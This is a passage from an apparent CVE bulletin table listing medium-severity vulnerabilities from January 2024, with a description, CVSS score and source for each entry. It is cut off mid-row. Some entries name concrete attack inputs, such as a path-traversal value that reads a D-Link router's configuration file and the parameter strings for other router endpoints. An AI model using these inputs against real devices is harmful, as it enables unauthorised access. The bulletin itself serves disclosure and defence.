| consensys — discovery | Consensys Discovery versions less than 0.4.5 uses the same AES/GCM nonce for the entire session. which should ideally be unique for every message. The node’s private key isn’t compromised, only the session key generated for specific peer communication is exposed. | 2024-01-19 | 5.3 | CVE-2024-23688 disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com |
| cozmoslabs — profile_builder_pro  |
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Cozmoslabs Profile Builder Pro. This issue affects Profile Builder Pro: from n/a through 3.10.0. | 2024-01-24 | 6.5 | CVE-2024-22141 audit@patchstack.com |
| d-link — dir-816_a2 Â |
A vulnerability has been found in D-Link DIR-816 A2 1.10CNB04 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /goform/setDeviceSettings of the component Web Interface. The manipulation of the argument statuscheckpppoeuser leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252139. | 2024-01-26 | 4.7 | CVE-2024-0921 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| d-link– dir-859 1.06B01 Â |
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DIR-859 1.06B01. It has been rated as critical. Affected by this issue is some unknown functionality of the file /hedwig.cgi of the component HTTP POST Request Handler. The manipulation of the argument service with the input ../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251666 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. | 2024-01-21 | 5.3 | CVE-2024-0769 cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| dell — dell_pair  |
Dell Pair Installer version prior to 1.2.1 contains an elevation of privilege vulnerability. A low privilege user with local access to the system could potentially exploit this vulnerability to delete arbitrary files and result in Denial of Service. | 2024-01-24 | 6.6 | CVE-2023-44281 security_alert@emc.com |
| dlink — dir-825acg1_firmware | A vulnerability classified as critical was found in D-Link DAP-1360, DIR-300, DIR-615, DIR-615GF, DIR-615S, DIR-615T, DIR-620, DIR-620S, DIR-806A, DIR-815, DIR-815AC, DIR-815S, DIR-816, DIR-820, DIR-822, DIR-825, DIR-825AC, DIR-825ACF, DIR-825ACG1, DIR-841, DIR-842, DIR-842S, DIR-843, DIR-853, DIR-878, DIR-882, DIR-1210, DIR-1260, DIR-2150, DIR-X1530, DIR-X1860, DSL-224, DSL-245GR, DSL-2640U, DSL-2750U, DSL-G2452GR, DVG-5402G, DVG-5402G, DVG-5402GFRU, DVG-N5402G, DVG-N5402G-IL, DWM-312W, DWM-321, DWR-921, DWR-953 and Good Line Router v2 up to 20240112. This vulnerability affects unknown code of the file /devinfo of the component HTTP GET Request Handler. The manipulation of the argument area with the input notice|net|version leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251542 is the identifier assigned to this vulnerability. | 2024-01-19 | 5.3 | CVE-2024-0717 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| efs — easy_file_sharing_ftp_3.6 Â |
A vulnerability classified as problematic has been found in EFS Easy File Sharing FTP 3.6. This affects an unknown part of the component Login. The manipulation of the argument password leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251559. | 2024-01-19 | 5.3 | CVE-2024-0736 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| elijahharry — hoolock  |
hoolock is a suite of lightweight utilities designed to maintain a small footprint when bundled. Starting in version 2.0.0 and prior to version 2.2.1, utility functions related to object paths (`get`, `set`, and `update`) did not block attempts to access or alter object prototypes. Starting in version 2.2.1, the `get`, `set` and `update` functions throw a `TypeError` when a user attempts to access or alter inherited properties. | 2024-01-22 | 6.3 | CVE-2024-23339 security-advisories@github.com security-advisories@github.com |
| european_chemicals_agency — IUCLID Â |
A vulnerability, which was classified as critical, was found in European Chemicals Agency IUCLID 7.10.3 on Windows. Affected is an unknown function of the file iuclid6.exe of the component Desktop Installer. The manipulation leads to incorrect default permissions. The attack needs to be approached locally. VDB-251670 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-21 | 4.4 | CVE-2024-0770 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| factominer — factoinvestigate | A vulnerability, which was classified as problematic, was found in FactoMineR FactoInvestigate up to 1.9. Affected is an unknown function of the component HTML Report Generator. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251544. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-19 | 6.1 | CVE-2024-0720 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| flink-extended — ai-flow  |
A vulnerability was found in flink-extended ai-flow 0.3.1. It has been declared as critical. Affected by this vulnerability is the function cloudpickle.loads of the file ai_flowclicommandsworkflow_command.py. The manipulation leads to deserialization. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-252205 was assigned to this vulnerability. | 2024-01-27 | 5 | CVE-2024-0960 cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| fusionpbx — fusionpbx | FusionPBX prior to 5.1.0 contains a cross-site scripting vulnerability. If this vulnerability is exploited by a remote authenticated attacker with an administrative privilege, an arbitrary script may be executed on the web browser of the user who is logging in to the product. | 2024-01-19 | 4.8 | CVE-2024-23387 vultures@jpcert.or.jp vultures@jpcert.or.jp vultures@jpcert.or.jp |
| gitlab — gitlab  |
An issue has been discovered in GitLab CE/EE affecting all versions after 13.7 before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. Improper input sanitization of user name allows arbitrary API PUT requests. | 2024-01-26 | 6.4 | CVE-2023-5933 cve@gitlab.com cve@gitlab.com cve@gitlab.com |
| gitlab — gitlab  |
An issue has been discovered in GitLab CE/EE affecting all versions from 12.7 prior to 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1 It was possible for an attacker to trigger a Regular Expression Denial of Service via a `Cargo.toml` containing maliciously crafted input. | 2024-01-26 | 6.5 | CVE-2023-6159 cve@gitlab.com cve@gitlab.com cve@gitlab.com |
| gitlab — gitlab  |
An issue has been discovered in GitLab affecting all versions before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. It was possible to read the user email address via tags feed although the visibility in the user profile has been disabled. | 2024-01-26 | 5.3 | CVE-2023-5612 cve@gitlab.com cve@gitlab.com cve@gitlab.com |
| gitlab — gitlab  |
An authorization vulnerability exists in GitLab versions 14.0 prior to 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. An unauthorized attacker is able to assign arbitrary users to MRs that they created within the project | 2024-01-26 | 4.3 | CVE-2024-0456 cve@gitlab.com cve@gitlab.com |
| go4rayyan — scumblr | A vulnerability, which was classified as problematic, has been found in go4rayyan Scumblr up to 2.0.1a. Affected by this issue is some unknown functionality of the component Task Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 2.0.2 is able to address this issue. The patch is identified as 5c9120f2362ddb7cbe48f2c4620715adddc4ee35. It is recommended to upgrade the affected component. VDB-251570 is the identifier assigned to this vulnerability. | 2024-01-21 | 6.1 | CVE-2016-15037 cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| gravitymaster — product_enquiry_for_woocommerce | The Product Enquiry for WooCommerce WordPress plugin before 3.1 does not have a CSRF check in place when deleting inquiries, which could allow attackers to make a logged in admin delete them via a CSRF attack | 2024-01-22 | 4.3 | CVE-2023-6625 contact@wpscan.com |
| gravitymaster — product_enquiry_for_woocommerce | The Product Enquiry for WooCommerce WordPress plugin before 3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) | 2024-01-22 | 4.8 | CVE-2023-6626 contact@wpscan.com |
| hewlett_packard_enterprise — hpe_oneview  |
HPE OneView may have a missing passphrase during restore. | 2024-01-23 | 5.5 | CVE-2023-6573 security-alert@hpe.com |
| hongmaple — octopus  |
A vulnerability was found in hongmaple octopus 1.0. It has been classified as critical. Affected is an unknown function of the file /system/role/list. The manipulation of the argument dataScope leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continuous delivery. Therefore, no version details for affected nor updated releases are available. The identifier of this vulnerability is VDB-251700. | 2024-01-22 | 6.3 | CVE-2024-0784 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| hongmaple — octopus  |
A vulnerability was found in hongmaple octopus 1.0. It has been classified as critical. Affected is an unknown function of the file /system/dept/edit. The manipulation of the argument ancestors leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Continuous delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. VDB-252042 is the identifier assigned to this vulnerability. | 2024-01-25 | 6.3 | CVE-2024-0890 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| honojs — node-server  |
@hono/node-server is an adapter that allows users to run Hono applications on Node.js. Since v1.3.0, @hono/node-server has used its own Request object with `url` behavior that is unexpected. In the standard API, if the URL contains `..`, here called “double dots”, the URL string returned by Request will be in the resolved path. However, the `url` in @hono/node-server’s Request as does not resolve double dots, so `http://localhost/static/.. /foo.txt` is returned. This causes vulnerabilities when using `serveStatic`. Modern web browsers and a latest `curl` command resolve double dots on the client side, so this issue doesn’t affect those using either of those tools. However, problems may occur if accessed by a client that does not resolve them. Version 1.4.1 includes the change to fix this issue. As a workaround, don’t use `serveStatic`. | 2024-01-22 | 5.3 | CVE-2024-23340 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
| humansignal — label-studio  |
Label Studio, an open source data labeling tool had a remote import feature allowed users to import data from a remote web source, that was downloaded and could be viewed on the website. Prior to version 1.10.1, this feature could had been abused to download a HTML file that executed malicious JavaScript code in the context of the Label Studio website. Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. For an example, an attacker can craft a JavaScript payload that adds a new Django Super Administrator user if a Django administrator visits the image. `data_import/uploader.py` lines 125C5 through 146 showed that if a URL passed the server side request forgery verification checks, the contents of the file would be downloaded using the filename in the URL. The downloaded file path could then be retrieved by sending a request to `/api/projects/{project_id}/file-uploads?ids=[{download_id}]` where `{project_id}` was the ID of the project and `{download_id}` was the ID of the downloaded file. Once the downloaded file path was retrieved by the previous API endpoint, `data_import/api.py`lines 595C1 through 616C62 demonstrated that the `Content-Type` of the response was determined by the file extension, since `mimetypes.guess_type` guesses the `Content-Type` based on the file extension. Since the `Content-Type` was determined by the file extension of the downloaded file, an attacker could import in a `.html` file that would execute JavaScript when visited. Version 1.10.1 contains a patch for this issue. Other remediation strategies are also available. For all user provided files that are downloaded by Label Studio, set the `Content-Security-Policy: sandbox;` response header when viewed on the site. The `sandbox` directive restricts a page’s actions to prevent popups, execution of plugins and scripts and enforces a `same-origin` policy. Alternatively, restrict the allowed file extensions that may be downloaded. | 2024-01-24 | 4.7 | CVE-2024-23633 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
| i3thuan5 — tuitse-tsusin  |
TuiTse-TsuSin is a package for organizing the comparative corpus of Taiwanese Chinese characters and Roman characters, and extracting sentences of the Taiwanese Chinese characters and the Roman characters. Prior to version 1.3.2, when using `tuitse_html` without quoting the input, there is a html injection vulnerability. Version 1.3.2 contains a patch for the issue. As a workaround, sanitize Taigi input with HTML quotation. | 2024-01-23 | 6.1 | CVE-2024-23341 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
| ibm — db2 | IBM Db2 10.1, 10.5, and 11.1 could allow a remote user to execute arbitrary code caused by installing like named jar files across multiple databases. A user could exploit this by installing a malicious jar file that overwrites the existing like named jar file in another database. IBM X-Force ID: 249205. | 2024-01-22 | 6.5 | CVE-2023-27859 psirt@us.ibm.com psirt@us.ibm.com |
| ibm — db2 | IIBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 could allow an authenticated user with CONNECT privileges to cause a denial of service using a specially crafted query. IBM X-Force ID: 270264. | 2024-01-22 | 6.5 | CVE-2023-47141 psirt@us.ibm.com psirt@us.ibm.com |
| ibm — db2 | IBM DB2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.1, 10.5, and 11.1 could allow an authenticated user with CONNECT privileges to cause a denial of service using a specially crafted query. IBM X-Force ID: 270750. | 2024-01-22 | 6.5 | CVE-2023-47158 psirt@us.ibm.com psirt@us.ibm.com |
| ibm — db2 | IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 could allow an authenticated user with CONNECT privileges to cause a denial of service using a specially crafted query. IBM X-Force ID: 272644. | 2024-01-22 | 6.5 | CVE-2023-47746 psirt@us.ibm.com psirt@us.ibm.com |
| ibm — db2 | IBM DB2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.1, 10.5, and 11.1 could allow an authenticated user with CONNECT privileges to cause a denial of service using a specially crafted query. IBM X-Force ID: 272646. | 2024-01-22 | 6.5 | CVE-2023-47747 psirt@us.ibm.com psirt@us.ibm.com |
| ibm — db2 | IBM Db2 for Linux, UNIX and Windows (includes DB2 Connect Server) 11.5 under certain circumstances could allow an authenticated user to the database to cause a denial of service when a statement is run on columnar tables. IBM X-Force ID: 273393. | 2024-01-22 | 6.5 | CVE-2023-50308 psirt@us.ibm.com psirt@us.ibm.com |
| ibm — maximo_application_suite | IBM Maximo Spatial Asset Management 8.10 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 255288. | 2024-01-19 | 5.4 | CVE-2023-32337 psirt@us.ibm.com psirt@us.ibm.com |
| ibm — sterling_control_center | IBM Sterling Control Center 6.3.0 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing “dot dot” sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 257874. | 2024-01-19 | 5.3 | CVE-2023-35020 psirt@us.ibm.com psirt@us.ibm.com |
| ibm — storage_defender_data_protect | IBM Storage Defender – Data Protect 1.0.0 through 1.4.1 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 276101. | 2024-01-19 | 5.4 | CVE-2023-50963 psirt@us.ibm.com psirt@us.ibm.com |
| icehrm — icehrm  |
IceHrm 23.0.0.OS does not sufficiently encode user-controlled input, which creates a Cross-Site Scripting (XSS) vulnerability via /icehrm/app/fileupload_page.php, in multiple parameters. An attacker could exploit this vulnerability by sending a specially crafted JavaScript payload and partially hijacking the victim’s browser. | 2024-01-25 | 5.4 | CVE-2023-6282 cve-coordination@incibe.es |
| ignazio_scimone — albo_pretorio_on_line  |
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Ignazio Scimone Albo Pretorio On line.This issue affects Albo Pretorio On line: from n/a through 4.6.6. | 2024-01-24 | 5.3 | CVE-2024-22301 audit@patchstack.com |
| intel — HIDPevent_filter  |
Insecure inherited permissions in some Intel HID Event Filter drivers for Windows 10 for some Intel NUC laptop software installers before version 2.2.2.1 may allow an authenticated user to potentially enable escalation of privilege via local access. | 2024-01-19 | 6.7 | CVE-2023-38541 secure@intel.com |
| intel — integrated_sensor_hub  |
Incorrect default permissions in some Intel Integrated Sensor Hub (ISH) driver for Windows 10 for Intel NUC P14E Laptop Element software installers before version 5.4.1.4479 may allow an authenticated user to potentially enable escalation of privilege via local access. | 2024-01-19 | 6.7 | CVE-2023-29244 secure@intel.com |
| intel — nuc_bios  |
Improper buffer restrictions for some Intel NUC BIOS firmware before version IN0048 may allow a privileged user to potentially enable escalation of privilege via local access. | 2024-01-19 | 6.7 | CVE-2023-28722 secure@intel.com |
| iobit — iobit_malware_fighter  |
IObit Malware Fighter v11.0.0.1274 is vulnerable to a Denial of Service vulnerability by triggering the 0x8001E00C IOCTL code of the ImfHpRegFilter.sys driver. | 2024-01-22 | 5.5 | CVE-2024-0430 help@fluidattacks.com help@fluidattacks.com |
| ip2location — ip2location_country_blocker  |
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in IP2Location IP2Location Country Blocker. This issue affects IP2Location Country Blocker: from n/a through 2.33.3. | 2024-01-24 | 5.3 | CVE-2024-22294 audit@patchstack.com |
| ipb-halle — molecularfaces | MolecularFaces before 0.3.0 is vulnerable to cross site scripting. A remote attacker can execute arbitrary JavaScript in the context of a victim browser via crafted molfiles. | 2024-01-19 | 6.1 | CVE-2024-0758 disclosure@vulncheck.com disclosure@vulncheck.com disclosure@vulncheck.com |
| jspxcms — jspxcms | A vulnerability has been found in Jspxcms 10.2.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Survey Label Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251545 was assigned to this vulnerability. | 2024-01-19 | 6.1 | CVE-2024-0721 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| juniper_networks — junos_os  |
A Missing Authentication for Critical Function vulnerability combined with a Generation of Error Message Containing Sensitive Information vulnerability in J-Web of Juniper Networks Junos OS on SRX Series and EX Series allows an unauthenticated, network-based attacker to access sensitive system information. When a user logs in, a temporary file which contains the configuration of the device (as visible to that user) is created in the /cache folder. An unauthenticated attacker can then attempt to access such a file by sending a specific request to the device trying to guess the name of such a file. Successful exploitation will reveal configuration information. This issue affects Juniper Networks Junos OS on SRX Series and EX Series: * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S7; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S6; * 22.1 versions earlier than 22.1R3-S5; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S2; * 22.4 versions earlier than 22.4R3; * 23.2 versions earlier than 23.2R1-S2, 23.2R2. | 2024-01-25 | 5.3 | CVE-2024-21619 sirt@juniper.net |
| jupyter — jupyterlab | JupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. This vulnerability depends on user interaction by opening a malicious Markdown file using JupyterLab preview feature. A malicious user can access any data that the attacked user has access to as well as perform arbitrary requests acting as the attacked user. JupyterLab version 4.0.11 has been patched. Users are advised to upgrade. Users unable to upgrade should disable the table of contents extension. | 2024-01-19 | 6.1 | CVE-2024-22420 security-advisories@github.com security-advisories@github.com |
| jupyter — jupyterlab | JupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. Users of JupyterLab who click on a malicious link may get their `Authorization` and `XSRFToken` tokens exposed to a third party when running an older `jupyter-server` version. JupyterLab versions 4.1.0b2, 4.0.11, and 3.6.7 are patched. No workaround has been identified, however users should ensure to upgrade `jupyter-server` to version 2.7.2 or newer which includes a redirect vulnerability fix. | 2024-01-19 | 6.5 | CVE-2024-22421 security-advisories@github.com security-advisories@github.com |
| kmint21 — golden_ftp_server  |
A vulnerability was found in Kmint21 Golden FTP Server 2.02b and classified as problematic. This issue affects some unknown processing of the component PASV Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252041 was assigned to this vulnerability. | 2024-01-25 | 5.3 | CVE-2024-0889 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| lantronix — xport  |
Lantronix XPort sends weakly encoded credentials within web request headers. | 2024-01-23 | 5.7 | CVE-2023-7237 ics-cert@hq.dhs.gov ics-cert@hq.dhs.gov |
| lenovo — app_store | An incorrect permissions vulnerability was reported in the Lenovo App Store app that could allow an attacker to use system resources, resulting in a denial of service. | 2024-01-19 | 5.5 | CVE-2023-6450 psirt@lenovo.com |
| lenovo — vantage | A privilege escalation vulnerability was reported in Lenovo Vantage that could allow a local attacker with physical access to impersonate Lenovo Vantage Service and execute arbitrary code with elevated privileges. | 2024-01-19 | 6.8 | CVE-2023-6044 psirt@lenovo.com |
| linecorp — line | An issue in nature fitness saijo mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-43988 cve@mitre.org |
| linecorp — line | An issue in mokumoku chohu mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-43989 cve@mitre.org |
| linecorp — line | An issue in cherub-hair mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-43990 cve@mitre.org |
| linecorp — line | An issue in PRIMA CLINIC mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-43991 cve@mitre.org |
| linecorp — line | An issue in STOCKMAN GROUP mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-43992 cve@mitre.org |
| linecorp — line | An issue in smaregi_app_market mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-43993 cve@mitre.org |
| linecorp — line | An issue in Cleaning_makotoya mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-43994 cve@mitre.org |
| linecorp — line | An issue in picot.golf mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-43995 cve@mitre.org |
| linecorp — line | An issue in Q co ltd mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-43996 cve@mitre.org |
| linecorp — line | An issue in Yoruichi hobby base mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-43997 cve@mitre.org |
| linecorp — line | An issue in Books-futaba mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-43998 cve@mitre.org |
| linecorp — line | An issue in COLORFUL_laundry mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-43999 cve@mitre.org |
| linecorp — line | An issue in Otakara lapis totuka mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-44000 cve@mitre.org |
| linecorp — line | An issue in Ailand clinic mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-24 | 5.4 | CVE-2023-44001 cve@mitre.org |
| linux — kernel  |
A use-after-free flaw was found in the __ext4_remount in fs/ext4/super.c in ext4 in the Linux kernel. This flaw allows a local user to cause an information leak problem while freeing the old quota file names before a potential failure, leading to a use-after-free. | 2024-01-22 | 6.7 | CVE-2024-0775 secalert@redhat.com secalert@redhat.com secalert@redhat.com |
| linux — kernel  |
NULL Pointer Dereference vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (net, bluetooth modules) allows Overflow Buffers. This vulnerability is associated with program files /net/bluetooth/rfcomm/core.C. This issue affects Linux kernel: v2.6.12-rc2. | 2024-01-25 | 6.3 | CVE-2024-22099 security@openanolis.org |
| linux — kernel  |
An out-of-bounds read vulnerability was found in Netfilter Connection Tracking (conntrack) in the Linux kernel. This flaw allows a remote user to disclose sensitive information via the DCCP protocol. | 2024-01-23 | 4 | CVE-2023-39197 secalert@redhat.com secalert@redhat.com |
| linux — kernel  |
Integer Overflow or Wraparound vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (md, raid, raid5 modules) allows Forced Integer Overflow. | 2024-01-25 | 4.4 | CVE-2024-23307 security@openanolis.org |
| liuwy-dlsdys — zhglxt | A vulnerability, which was classified as problematic, has been found in liuwy-dlsdys zhglxt 4.7.7. This issue affects some unknown processing of the file /oa/notify/edit of the component HTTP POST Request Handler. The manipulation of the argument notifyTitle leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251543. | 2024-01-19 | 4.8 | CVE-2024-0718 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| lizard-ware — spycamlizard  |
A vulnerability classified as problematic has been found in SpyCamLizard 1.230. Affected is an unknown function of the component HTTP GET Request Handler. The manipulation leads to denial of service. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252036. | 2024-01-25 | 5.3 | CVE-2024-0885 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| ljapps — wp_review_slider | The WP Review Slider WordPress plugin before 13.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) | 2024-01-22 | 4.8 | CVE-2023-6456 contact@wpscan.com |
| mafiatic — blue_server  |
A vulnerability, which was classified as problematic, has been found in Mafiatic Blue Server 1.1. Affected by this issue is some unknown functionality of the component Connection Handler. The manipulation leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252038 is the identifier assigned to this vulnerability. | 2024-01-25 | 5.3 | CVE-2024-0887 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| martinmbithi — internet_banking_system | A vulnerability classified as problematic was found in CodeAstro Internet Banking System 1.0. Affected by this vulnerability is an unknown functionality of the file pages_client_signup.php. The manipulation of the argument Client Full Name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251677 was assigned to this vulnerability. | 2024-01-22 | 5.4 | CVE-2024-0773 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| meris_wp_theme_project — meris_wp_theme | The Meris WordPress theme through 1.1.2 does not sanitise and escape some parameters before outputting them back in the page, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin | 2024-01-22 | 6.1 | CVE-2023-7194 contact@wpscan.com |
| metagauss — eventprime | The EventPrime WordPress plugin before 3.3.6 lacks authentication and authorization, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id/event name. | 2024-01-22 | 5.3 | CVE-2023-6447 contact@wpscan.com |
| microsoft — microsoft_edge_(chromium-based) Â |
Microsoft Edge for Android Spoofing Vulnerability | 2024-01-26 | 5.3 | CVE-2024-21387 secure@microsoft.com |
| microsoft — microsoft_edge_(chromium-based) Â |
Microsoft Edge for Android Information Disclosure Vulnerability | 2024-01-26 | 4.3 | CVE-2024-21382 secure@microsoft.com |
| mintplex-labs — vector-admin  |
Authentication bypass in vector-admin allows a user to register to a vector-admin server while “domain restriction” is active, even when not owning an authorized email address. | 2024-01-25 | 6.5 | CVE-2024-0879 reefs@jfrog.com reefs@jfrog.com |
| myeventon — rsvp_events | The EventON-RSVP WordPress plugin before 2.9.5 does not sanitise and escape some parameters before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin | 2024-01-22 | 6.1 | CVE-2023-7170 contact@wpscan.com |
| niushop — b2b2c  |
A vulnerability was found in Niushop B2B2C V5 and classified as critical. Affected by this issue is some unknown functionality of the file appmodelUpload.php. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252140. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 6.3 | CVE-2024-0933 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| novel-plus — novel-plus  |
A vulnerability was found in Novel-Plus 4.3.0-RC1 and classified as critical. This issue affects some unknown processing of the file /novel/bookComment/list. The manipulation of the argument sort leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-252185 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-26 | 5.5 | CVE-2024-0941 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| nsasoft — sharealarmpro  |
A vulnerability was found in Nsasoft ShareAlarmPro 2.1.4 and classified as problematic. Affected by this issue is some unknown functionality of the component Registration Handler. The manipulation of the argument Name/Key leads to memory corruption. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251672. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-22 | 5.3 | CVE-2024-0772 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| nsasoft– product_key_explorer  |
A vulnerability has been found in Nsasoft Product Key Explorer 4.0.9 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Registration Handler. The manipulation of the argument Name/Key leads to memory corruption. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251671. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-21 | 5.3 | CVE-2024-0771 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| obgm — libcoap  |
A vulnerability was found in obgm libcoap 4.3.4. It has been rated as critical. Affected by this issue is the function get_split_entry of the file src/coap_oscore.c of the component Configuration File Handler. The manipulation leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-252206 is the identifier assigned to this vulnerability. | 2024-01-27 | 6.3 | CVE-2024-0962 cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com cna@vuldb.com |
| openfga — openfga  |
